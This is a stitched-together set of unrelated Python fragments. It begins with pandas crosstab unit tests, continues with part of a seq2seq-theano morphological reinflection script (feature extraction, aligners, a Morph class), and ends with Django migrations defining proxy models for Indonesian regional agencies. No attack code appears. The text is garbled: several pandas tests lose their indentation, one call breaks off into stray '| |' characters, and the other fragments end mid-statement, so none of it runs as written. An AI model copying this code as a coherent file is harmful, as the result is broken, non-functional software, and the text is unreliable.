    cols = Series(range(1, 4), name=names[1])
    mi = MultiIndex.from_arrays([range(3), range(1, 4)], names=names)
    expected = Series(1, index=mi).unstack(1, fill_value=0)
    tm.assert_frame_equal(crosstab(rows, cols), expected)
def test_crosstab_both_tuple_names(self):
# GH 18321
s1 = Series(range(3), name=("a", "b"))
s2 = Series(range(3), name=("c", "d"))
expected = DataFrame(
np.eye(3, dtype="int64"),
index=Index(range(3), name=("a", "b")),
columns=Index(range(3), name=("c", "d")),
)
result = crosstab(s1, s2)
tm.assert_frame_equal(result, expected)
def test_crosstab_unsorted_order(self):
df = DataFrame({"b": [3, 1, 2], "a": [5, 4, 6]}, index=["C", "A", "B"])
result = crosstab(df.index, [df.b, df.a])
e_idx = Index(["A", "B", "C"], name="row_0")
e_columns = MultiIndex.from_tuples([(1, 4), (2, 6), (3, 5)], names=["b", "a"])
expected = DataFrame(
[[1, 0, 0], [0, 1, 0], [0, 0, 1]], index=e_idx, columns=e_columns
)
tm.assert_frame_equal(result, expected)
def test_crosstab_normalize_multiple_columns(self):
    # GH 15150
    # All D values are 0, so every normalized cell is 0 except the
    # All/All margin, which is defined to be 1.
    df = DataFrame(
        {
            "A": ["one", "one", "two", "three"] * 6,
            "B": ["A", "B", "C"] * 8,
            "C": ["foo", "foo", "foo", "bar", "bar", "bar"] * 4,
            "D": [0] * 24,
            "E": [0] * 24,
        }
    )
    result = crosstab(
        [df.A, df.B],
        df.C,
        values=df.D,
        aggfunc=np.sum,
        normalize=True,
        margins=True,
    )
    # 10 rows (9 (A, B) combinations + the All margin) x 3 columns.
    expected = DataFrame(
        np.array([0] * 29 + [1], dtype=float).reshape(10, 3),
        columns=Index(["bar", "foo", "All"], dtype="object", name="C"),
        index=MultiIndex.from_tuples(
            [
                ("one", "A"),
                ("one", "B"),
                ("one", "C"),
                ("three", "A"),
                ("three", "B"),
                ("three", "C"),
                ("two", "A"),
                ("two", "B"),
                ("two", "C"),
                ("All", ""),
            ],
            names=["A", "B"],
        ),
    )
    tm.assert_frame_equal(result, expected)
def test_margin_normalize(self):
    # GH 27500
    # Normalizing with a custom margins_name: the margin row/column is
    # dropped or kept depending on the normalize axis.
    df = DataFrame(
        {
            "A": ["foo", "foo", "foo", "foo", "foo", "bar", "bar", "bar", "bar"],
            "B": ["one", "one", "one", "two", "two", "one", "one", "two", "two"],
            "C": [
                "small",
                "large",
                "large",
                "small",
                "small",
                "large",
                "small",
                "small",
                "large",
            ],
            "D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
            "E": [2, 4, 5, 5, 6, 6, 8, 9, 9],
        }
    )
    # normalize on index: rows sum to 1; the margin row is kept but the
    # margin column is dropped.
    result = crosstab(
        [df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=0
    )
    expected = DataFrame(
        [[0.5, 0.5], [0.5, 0.5], [0.666667, 0.333333], [0, 1], [0.444444, 0.555556]]
    )
    expected.index = MultiIndex(
        levels=[["Sub-Total", "bar", "foo"], ["", "one", "two"]],
        codes=[[1, 1, 2, 2, 0], [1, 2, 1, 2, 0]],
        names=["A", "B"],
    )
    expected.columns = Index(["large", "small"], dtype="object", name="C")
    tm.assert_frame_equal(result, expected)
    # normalize on columns: columns sum to 1; the margin column is kept
    # but the margin row is dropped.
    result = crosstab(
        [df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=1
    )
    expected = DataFrame(
        [
            [0.25, 0.2, 0.222222],
            [0.25, 0.2, 0.222222],
            [0.5, 0.2, 0.333333],
            [0, 0.4, 0.222222],
        ]
    )
    expected.columns = Index(
        ["large", "small", "Sub-Total"], dtype="object", name="C"
    )
    expected.index = MultiIndex(
        levels=[["bar", "foo"], ["one", "two"]],
        codes=[[0, 0, 1, 1], [0, 1, 0, 1]],
        names=["A", "B"],
    )
    tm.assert_frame_equal(result, expected)
    # normalize on both index and column: grand total is 1; both margins
    # are kept.
    result = crosstab(
        [df.A, df.B], df.C, margins=True, margins_name="Sub-Total", normalize=True
    )
    expected = DataFrame(
        [
            [0.111111, 0.111111, 0.222222],
            [0.111111, 0.111111, 0.222222],
            [0.222222, 0.111111, 0.333333],
            [0.000000, 0.222222, 0.222222],
            [0.444444, 0.555555, 1],
        ]
    )
    expected.columns = Index(
        ["large", "small", "Sub-Total"], dtype="object", name="C"
    )
    expected.index = MultiIndex(
        levels=[["Sub-Total", "bar", "foo"], ["", "one", "two"]],
        codes=[[1, 1, 2, 2, 0], [1, 2, 1, 2, 0]],
        names=["A", "B"],
    )
    tm.assert_frame_equal(result, expected)
def test_margin_normalize_multiple_columns(self):
    # GH 35144
    # use multiple columns with margins and normalization
    df = DataFrame(
        {
            "A": ["foo", "foo", "foo", "foo", "foo", "bar", "bar", "bar", "bar"],
            "B": ["one", "one", "one", "two", "two", "one", "one", "two", "two"],
            "C": [
                "small",
                "large",
                "large",
                "small",
                "small",
                "large",
                "small",
                "small",
                "large",
            ],
            "D": [1, 2, 2, 3, 3, 4, 5, 6, 7],
            "E": [2, 4, 5, 5, 6, 6, 8, 9, 9],
        }
    )
    result = crosstab(
        index=df.C,
        columns=[df.A, df.B],
        margins=True,
        margins_name="margin",
        normalize=True,
    )
    # Grand total normalizes to 1.0 in the bottom-right margin cell.
    expected = DataFrame(
        [
            [0.111111, 0.111111, 0.222222, 0.000000, 0.444444],
            [0.111111, 0.111111, 0.111111, 0.222222, 0.555556],
            [0.222222, 0.222222, 0.333333, 0.222222, 1.0],
        ],
        index=["large", "small", "margin"],
    )
    # Columns: (A, B) pairs plus a trailing ("margin", "") column.
    expected.columns = MultiIndex(
        levels=[["bar", "foo", "margin"], ["", "one", "two"]],
        codes=[[0, 0, 1, 1, 2], [1, 2, 1, 2, 0]],
        names=["A", "B"],
    )
    expected.index.name = "C"
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("a_dtype", ["category", "int64"])
@pytest.mark.parametrize("b_dtype", ["category", "int64"])
def test_categoricals(a_dtype, b_dtype):
# https://github.com/pandas-dev/pandas/issues/37465
g = np.random.RandomState(25982704)
a = Series(g.randint(0, 3, size=100)).astype(a_dtype)
b = Series(g.randint(0, 2, size=100)).astype(b_dtype)
result = crosstab(a, b, margins=True, dropna=False)
columns = Index([0, 1, "All"], dtype="object", name="col_0")
index = Index([0, 1, 2, "All"], dtype="object", name="row_0")
values = [[18, 16, 34], [18, 16, 34], [16, 16, 32], [52, 48, 100]]
expected = DataFrame(values, index, columns)
tm.assert_frame_equal(result, expected)
# Verify when categorical does not have all values present
a.loc[a == 1] = 2
a_is_cat = is_categorical_dtype(a.dtype)
assert not a_is_cat or a.value_counts().loc[1] == 0
result = crosstab(a, b, | |
# Source repository: oncebasun/seq2seq-theano
# -*- coding: utf-8 -*-
#!/usr/bin/env python
from __future__ import print_function
from MyAlgorithm.filter_wrong_forms_reinflection_new import Filter as Filter2 # the 'new' here is a test
from MyAlgorithm.filter_wrong_forms import Filter
import perceptron_c, align, codecs, sys, re, getopt
import pickle as cPickle
from itertools import izip
import sys
import datetime
import time
import io
import editdistance
from shutil import copyfile
from random import shuffle
import codecs
import argparse
import logging
import pprint
import sys
import os, signal
from RNN import configurations2 as configurations
from RNN.__init__BACKUP import main as rnnMain
#print('lala')
from RNN.__init__BACKUP import mainPredict as rnnPredict
from RNN.stream import get_tr_stream, get_test_stream, get_dev_stream
import RNN.sampling as sampling
###############################################################################
# IMPORTANT: NEVER TOUCH ANY OF THIS. ONLY CHANGES ALLOWED ARE VIA COMMAND LINE.
# The filter evaluating which results are right and which are wrong.
noFilter = True #TODO: change this via command line ONLY
# This is for the NN I used before. Don't activate this anymore; results were horrible.
loadModel = False
# Defines which classifier should be used.
classifierToUse = 'rnn' # Options are: 'perceptron' (=baseline), 'rnn', 'nn' ('nn' should not be used anymore)
# Use trainRnn=True to train the RNN. For evaluation use trainRnn=False.
trainRnn = True # has to be set only when RNN is used TODO: change this via command line ONLY
# Defines if testing should be done with an ensemble. (0 means no, a number is the number of single networks)
use_ensemble = 1 # number of networks in the ensemble in testing; in training number of the currently trained network; TODO: change this via command line ONLY
# If the system should use corpus information for error correction.
# This has only effect when using it together with 'noFilter = False'.
use_corpus = False #TODO: change this via command line ONLY
######### command line flags
# NOTE(review): presumably samples outputs from the model distribution
# instead of taking the argmax when True — confirm against rnnPredict usage.
sample_from_prob = False
# NOTE(review): presumably evaluates on the dev split instead of test
# when True — confirm against the stream-selection code.
test_on_dev = False
the_way = 1 # how the answer will be produced
###############################################################################
class MorphModel:
    """Per-POS bundle of training features, action classes and trained
    classifiers, one slot per direction ('tolemma' / 'fromlemma').

    All slots start out as None until training fills them in.
    """

    def __init__(self):
        directions = ('tolemma', 'fromlemma')
        self.features = dict.fromkeys(directions)
        self.classes = dict.fromkeys(directions)
        self.classifier = dict.fromkeys(directions)
class Morph:
    # Top-level container: one MorphModel per POS tag, plus an optional
    # MSD classifier trained from surface-form substrings.
    def __init__(self):
        self.models = {}  # pos tag -> MorphModel
        self.msdfeatures = None
        self.msdclasses = None
        self.msdclassifier = None

    def generate(self, word, featurestring, mode):
        #print('Input: ' + word)
        """Generates an output string from an input word and target
        feature string. The 'mode' variable is either 'tolemma' or
        'fromlemma' """
        # POS is parsed out of the MSD string; selects the per-POS model.
        pos = re.match(r'pos=([^,]*)', featurestring).group(1)
        # '<' and '>' are word-boundary sentinels, mirrored in training.
        ins = ['<'] + list(word) + ['>']
        outs = []
        prevaction = 'None'
        position = 0
        while position < len(ins):
            # Context features: input window, already-emitted output
            # window (no right context), previous action, and the MSD.
            feats = list(train_get_surrounding_syms(ins, position, u'in_')) + \
                list(train_get_surrounding_syms(outs, position, u'out_', lookright = False)) + \
                ['prevaction='+prevaction] + [u'MSD:' + featurestring]
            feats = feature_pairs(feats)
            # NOTE(review): usePerceptron and mlp are globals defined
            # elsewhere in this file — confirm which branch is active.
            if usePerceptron:
                decision = self.models[pos].classifier[mode].decision_function(feats)
            else:
                decision = mlp.decision_function(self.models[pos].classifier[mode], feats)
            # Rank candidate actions by score, best first.
            decision = sorted(decision, key = lambda x: x[1], reverse = True)
            prevaction = self._findmax(decision, prevaction, len(ins)-position-1)
            # interpret_action (defined elsewhere) turns the action label
            # into emitted text plus how far to advance in the input.
            actionlength, outstring = interpret_action(prevaction, ins[position])
            outs.append(outstring)
            position += actionlength
        # Strip the boundary sentinels before returning.
        return ''.join(outs[1:-1])

    def _findmax(self, decision, lastaction, maxlength):
        """Find best action that doesn't conflict with last (can't del/ins/chg two in a row)
        and isn't too long (can't change/del more than what remains)."""
        #return decision # TODO: this is a hack. Rethink it
        if lastaction[0] == 'D' or lastaction[0] == 'C' or lastaction[0] == 'I':
            # Python 2 xrange; scan ranked actions for the first one that
            # neither repeats the last action type nor overruns the input.
            for x in xrange(len(decision)):
                if decision[x][0][0] != lastaction[0]:
                    if decision[x][0][0] == u'C' and len(decision[x][0][1:]) > maxlength:
                        continue
                    if decision[x][0][0] == u'D' and int(decision[x][0][1:]) > maxlength:
                        continue
                    return decision[x][0]
        else:
            # Last action was unconstrained: just take the top-scoring one.
            return decision[0][0]

    def add_features(self, pos, features, classes, mode):
        """Adds a collection of feautures and classes to a pos model
        'mode' is either 'tolemma' or 'fromlemma'."""
        if pos not in self.models:
            self.models[pos] = MorphModel()
        self.models[pos].features[mode] = features
        self.models[pos].classes[mode] = classes

    def get_pos(self):
        """Simply lists all poses associated with a model."""
        return list(self.models.keys())

    def add_classifier(self, pos, classifier, mode):
        """Adds a classifier to a pos model in a certain mode."""
        self.models[pos].classifier[mode] = classifier

    def get_features(self, pos, mode):
        # Accessor for the raw training features of one POS/direction.
        return self.models[pos].features[mode]

    def get_classes(self, pos, mode):
        # Accessor for the action classes of one POS/direction.
        return self.models[pos].classes[mode]

    def extract_task3(self, lang, path):
        # We use the msd/form combinations from all three
        # SIGMORPHON shared-task training files (task1/2/3) to train the
        # MSD classifier from surface-form substring features.
        msdform = set()
        lines = [line.strip() for line in codecs.open(path + lang +'-task1-train', "r", encoding="utf-8")]
        for l in lines:
            lemma, msd, form = l.split(u'\t')
            msdform.add((msd, form))
        lines = [line.strip() for line in codecs.open(path + lang +'-task2-train', "r", encoding="utf-8")]
        for l in lines:
            msd1, form1, msd2, form2 = l.split(u'\t')
            msdform.add((msd1, form1))
            msdform.add((msd2, form2))
        lines = [line.strip() for line in codecs.open(path + lang +'-task3-train', "r", encoding="utf-8")]
        for l in lines:
            form1, msd2, form2 = l.split(u'\t')
            msdform.add((msd2, form2))
        self.msdfeatures = []
        self.msdclasses = []
        for msd, form in msdform:
            # extract_substrings is defined elsewhere in this file.
            formfeatures = extract_substrings(form)
            self.msdfeatures.append(formfeatures)
            self.msdclasses.append(msd)

    def extract_task1(self, filename, mode, path):
        """Parse a file and extract features/classes for
        mapping to and from a lemma form."""
        lemmas = {} # mapping from each lemma to all its possible forms (including the lemma itself)
        poses = set()
        lines = [line.strip() for line in codecs.open(path + filename, "r", encoding="utf-8")]
        for l in lines:
            if 'pos=' not in l:
                continue
            lemma, feats, form = l.split(u'\t')
            pos = re.match(r'pos=([^,]*)', feats).group(1)
            if lemma not in lemmas:
                lemmas[lemma] = []
                # The lemma itself is stored as a pseudo-form tagged lemma=true.
                lemmas[lemma].append((lemma, 'pos=' + pos + ',lemma=true'))
            lemmas[lemma].append((form, feats)) # form is the word, feats are the tags
            if pos not in poses:
                poses.add(pos)
        pairs = []
        wordpairs = []
        for lemma in lemmas:
            lemmafeatures = lemmas[lemma]
            # Pair the lemma with every inflected form, oriented by mode.
            for x in lemmafeatures:
                for y in lemmafeatures:
                    if (x != y) and ('lemma=true' in x[1]) and (mode == 'fromlemma'):
                        pairs.append(tuple((x[0], y[0], y[1]))) # lemma, word, tags
                        wordpairs.append(tuple((x[0], y[0])))
                    elif (x != y) and ('lemma=true' in x[1]) and (mode == 'tolemma'):
                        pairs.append(tuple((y[0], x[0], y[1]))) # word, lemma, tags
                        wordpairs.append(tuple((y[0], x[0])))
        # ALIGNTYPE and ALIGN_SYM are module-level settings defined elsewhere.
        if ALIGNTYPE == 'mcmc':
            alignedpairs = mcmc_align(wordpairs, ALIGN_SYM)
        elif ALIGNTYPE == 'med':
            alignedpairs = med_align(wordpairs, ALIGN_SYM)
        else:
            alignedpairs = dumb_align(wordpairs, ALIGN_SYM)
        chunkedpairs = chunk(alignedpairs) # segments aligned pairs so input and output have equal length
        for pos in poses: # Do one model per POS
            features = []
            classes = []
            # sample pair: [(u'L', u'L'), (u'u', u'\xfc'), (u's', u's'), (u't', u't'), (u'_', u'e')]
            for idx, pair in enumerate(chunkedpairs):
                if 'pos=' + pos not in pairs[idx][2]:
                    continue
                instring = ['<'] + [x[0] for x in pair] + ['>']
                outstring = ['<'] + [x[1] for x in pair] + ['>']
                msdfeatures = [ pairs[idx][2] ] # don't separate features
                msdfeatures = ['MSD:' + f for f in msdfeatures] # just put MSD in front of them
                prevaction = 'None'
                for position in range(0, len(instring)): # len(instring) = len(outstring)! Because of chunking
                    # train_get_features (defined elsewhere) yields the
                    # gold action class and its context features.
                    thiscl, feats = train_get_features(instring, outstring, position)
                    classes.append(thiscl) # as a class, I should insert Umlaut
                    featurelist = list(feats) + msdfeatures + ['prevaction='+prevaction]
                    featurelist = feature_pairs(featurelist)
                    features.append(featurelist)
                    prevaction = thiscl
            self.add_features(pos, features, classes, mode)
def feature_pairs(f):
    """Expand features to include pairs of features
    where one is always a f=v feature."""
    combos = []
    for left in f:
        for right in f:
            if u'=' in right:
                combos.append(left + ".x." + right)
    return combos + f
def dumb_align(wordpairs, align_symbol):
    """Trivial aligner: right-pad the shorter member of each pair with
    align_symbol so both strings end up the same length."""
    padded = []
    for ins, outs in wordpairs:
        gap = len(ins) - len(outs)
        if gap > 0:
            outs = outs + align_symbol * gap
        elif gap < 0:
            ins = ins + align_symbol * (-gap)
        padded.append((ins, outs))
    return padded
def mcmc_align(wordpairs, align_symbol):
    """Align word pairs with the (stochastic) MCMC aligner."""
    aligner = align.Aligner(wordpairs, align_symbol = align_symbol)
    return aligner.alignedpairs
def med_align(wordpairs, align_symbol):
    """Align word pairs using minimum-edit-distance alignment."""
    aligner = align.Aligner(wordpairs, align_symbol = align_symbol, mode = 'med')
    return aligner.alignedpairs
def train_get_surrounding_syms(s, position, featureprefix, lookright = True):
    """Get surrounding symbols from a list of chunks and position.

    Emits up to three left-context features ('p' + prefix + suffix of the
    left context) and, when lookright is set, up to three right-context
    features ('n' + prefix + prefix of the right context).  The alignment
    filler '_' is stripped before slicing; boundary positions yield the
    special '...none' feature instead.
    """
    feats = set()
    if position == 0:
        feats.add(u'p' + featureprefix + u'none')
    elif position > 0:
        left = ''.join(s[:position]).replace(u'_', u'')
        for n in (-1, -2, -3):
            feats.add(u'p' + featureprefix + left[n:])
    if lookright:
        if position == len(s):
            feats.add(u'n' + featureprefix + u'none')
        if position < len(s):
            right = ''.join(s[position:]).replace(u'_', u'')
            for n in (1, 2, 3):
                feats.add(u'n' + featureprefix + right[:n])
    return feats
def train_get_features(ins, outs, position):
feats = set()
# Get class first #
if ins[position] == outs[position]:
cl = "R"
elif u'_' in ins[position]:
cl = "I" + outs[position]
elif u'_' in | |
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 1 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 1 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Batumandi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Juai',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Juai',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Juai',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Lampihong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Lampihong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Lampihong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Batumandi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Batumandi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN5Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 5 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 5 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN5Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 5 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 5 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikTebingTinggi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik Tebing Tinggi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik Tebing Tinggi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDishub',
fields=[
],
options={
'verbose_name': '04 SKPD Asal ATL Dishub',
'proxy': True,
'verbose_name_plural': '04 SKPD Asal ATL Dishub',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisnakertrans',
fields=[
],
options={
'verbose_name': '41 SKPD Asal ATL Disnakertrans',
'proxy': True,
'verbose_name_plural': '41 SKPD Asal ATL Disnakertrans',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDistamben',
fields=[
],
options={
'verbose_name': '17 SKPD Asal ATL Distamben',
'proxy': True,
'verbose_name_plural': '17 SKPD Asal ATL Distamben',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKO',
fields=[
],
options={
'verbose_name': '23 SKPD Asal ATL DKO',
'proxy': True,
'verbose_name_plural': '23 SKPD Asal ATL DKO',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKP',
fields=[
],
options={
'verbose_name': '15 SKPD Asal ATL DKP',
'proxy': True,
'verbose_name_plural': '15 SKPD Asal ATL DKP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKUKMP',
fields=[
],
options={
'verbose_name': '16 SKPD Asal ATL DKUKMP',
'proxy': True,
'verbose_name_plural': '16 SKPD Asal ATL DKUKMP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDLH',
fields=[
],
options={
'verbose_name': '22 SKPD Asal ATL DLH',
'proxy': True,
'verbose_name_plural': '22 SKPD Asal ATL DLH',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPKP',
fields=[
],
options={
'verbose_name': '40 SKPD Asal ATL DPKP',
'proxy': True,
'verbose_name_plural': '40 SKPD Asal ATL DPKP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPMD',
fields=[
],
options={
'verbose_name': '10 SKPD Asal ATL DPMD',
'proxy': True,
'verbose_name_plural': '10 SKPD Asal ATL DPMD',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPMPTSP',
fields=[
],
options={
'verbose_name': '18 SKPD Asal ATL DPMPTSP',
'proxy': True,
'verbose_name_plural': '18 SKPD Asal ATL DPMPTSP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPPKB',
fields=[
],
options={
'verbose_name': '42 SKPD Asal ATL DPPKB',
'proxy': True,
'verbose_name_plural': '42 SKPD Asal ATL DPPKB',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPPPA',
fields=[
],
options={
'verbose_name': '11 SKPD Asal ATL DPPPA',
'proxy': True,
'verbose_name_plural': '11 SKPD Asal ATL DPPPA',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPUPR',
fields=[
],
options={
'verbose_name': '03 SKPD Asal ATL DPUPR',
'proxy': True,
'verbose_name_plural': '03 SKPD Asal ATL DPUPR',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDukCatPil',
fields=[
],
options={
'verbose_name': '12 SKPD Asal ATL DukCatPil',
'proxy': True,
'verbose_name_plural': '12 SKPD Asal ATL DukCatPil',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLHalong',
fields=[
],
options={
'verbose_name': '35 SKPD Asal ATL Halong',
'proxy': True,
'verbose_name_plural': '35 SKPD Asal ATL Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLInspektorat',
fields=[
],
options={
'verbose_name': '20 SKPD Asal ATL Inspektorat',
'proxy': True,
'verbose_name_plural': '20 SKPD Asal ATL Inspektorat',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLJuai',
fields=[
],
options={
'verbose_name': '33 SKPD Asal ATL Juai',
'proxy': True,
'verbose_name_plural': '33 SKPD Asal ATL Juai',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKearsipan',
fields=[
],
options={
'verbose_name': '44 SKPD Asal ATL Kearsipan',
'proxy': True,
'verbose_name_plural': '44 SKPD Asal ATL Kearsipan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKehutanan',
fields=[
],
options={
'verbose_name': '14 SKPD Asal ATL Kehutanan',
'proxy': True,
'verbose_name_plural': '14 SKPD Asal ATL Kehutanan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKESBANGPOL',
fields=[
],
options={
'verbose_name': '24 SKPD Asal ATL KESBANGPOL',
'proxy': True,
'verbose_name_plural': '24 SKPD Asal ATL KESBANGPOL',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKominfo',
fields=[
],
options={
'verbose_name': '43 SKPD Asal ATL Kominfo',
'proxy': True,
'verbose_name_plural': '43 SKPD Asal ATL Kominfo',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLLampihong',
fields=[
],
options={
'verbose_name': '31 SKPD Asal ATL Lampihong',
'proxy': True,
'verbose_name_plural': '31 SKPD Asal ATL Lampihong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParingin',
fields=[
],
options={
'verbose_name': '28 SKPD Asal ATL Paringin',
'proxy': True,
'verbose_name_plural': '28 SKPD Asal ATL Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginKota',
fields=[
],
options={
'verbose_name': '29 SKPD Asal ATL Paringin Kota',
'proxy': True,
'verbose_name_plural': '29 SKPD Asal ATL Paringin Kota',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginSelatan',
fields=[
],
options={
'verbose_name': '36 SKPD Asal ATL Paringin Selatan',
'proxy': True,
'verbose_name_plural': '36 SKPD Asal ATL Paringin Selatan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginTimur',
fields=[
],
options={
'verbose_name': '30 SKPD Asal ATL Paringin Timur',
'proxy': True,
'verbose_name_plural': '30 SKPD Asal ATL Paringin Timur',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPariwisata',
fields=[
],
options={
'verbose_name': '46 SKPD Asal ATL Pariwisata',
'proxy': True,
'verbose_name_plural': '46 SKPD Asal ATL Pariwisata',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPerdagangan',
fields=[
],
options={
'verbose_name': '47 SKPD Asal ATL Perdagangan',
'proxy': True,
'verbose_name_plural': '47 SKPD Asal ATL Perdagangan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPerikanan',
fields=[
],
options={
'verbose_name': '45 SKPD Asal ATL Perikanan',
'proxy': True,
'verbose_name_plural': '45 SKPD Asal ATL Perikanan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
